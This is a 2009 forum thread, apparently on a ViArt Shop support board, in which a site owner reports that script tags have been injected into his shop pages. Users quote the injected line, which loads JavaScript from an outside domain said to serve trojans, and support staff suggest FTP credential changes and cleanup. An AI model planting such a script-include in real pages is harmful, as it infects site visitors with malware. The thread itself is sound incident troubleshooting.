I've been testing this software with the view to upgrading a couple of other ecommerce sites to use this. All was going well until the other day when I've noticed that the sites I have up that use Viart have been comprimised.
An example is at www.welovepostcards.co.uk if you check the source of the page you'll see extra coding dropped in right at the top of the page linking to a loaded site, (make sure you have antivirus etc and its up to date as they appear loaded with trojans)
I only noticed this as my site styling suddenly went to pot and I was trying to work out what had caused it when I spotted these links and thought "thats nothing to do with me!!"
It must be a script somewhere as its coming up on each page, I've queried my Hosting company and also Viart but I want to try to resolve this asap.
I know its only a Viart / php issue as other sites with the same host are all fine, i've checked them through and they appear to be uncomprimised.
Any help, advice or pointers would be appreciated
Regards
S :)
foxtrotdomains.com
21 Jan 2009 1:54 PM
Is this note a responsibility of the hosting site?
I am just curios.
SajMalik
21 Jan 2009 3:14 PM
Do you mean the line:
<script type=text/javascript src=http://thewelbeck.com/c06.js></script>?
It's for a hotel in Blackpool - interesting hack?
life-of-brian (Guest)
21 Jan 2009 3:21 PM
Thats exactly it, although it changes on a page by page basis i've found, so its pulling information from somewhere that i can't find..
Those pages also seem to have been comprimised as my antivirus picks up all sorts on some of the linked pages..
I just need to try to track down how they've got in, which i'm waiting for my hosts help with, and then to find out what they're using to be able to do this as its only affecting sites that I run using viart, all others are fine.
very odd though, i've never seen a hack like this before
S :)
Anjula
21 Jan 2009 3:40 PM
Hello,
Thanks for raising this issue. I will comment on this:
1. The issue you're talking about most probably has to do with attacks that take place due to gaining an FTP access to the site and does not relate to the shop scripts.
2. We advise to change the FTP login details to the site as soon as you notice or suspect the hack attack. It is also recommended to change the Admin access details to the site.
3. Next step is to check all computers that had an access to a site via FTP.
4. And lastly remove the alien code that does not relate to viart code or download a standard version of ViArt Shop from our site and replace the infected files with the standard ones.
With kind regards,
ViArt Support Team
freezer
22 Jan 2009 5:03 PM
With my limited knowledge could you not see when the file which has had code added was last updated and then maybe ask yor isp to check the logs to see if indeed the change was made via ftp at this time or if not what activity was taking place around then.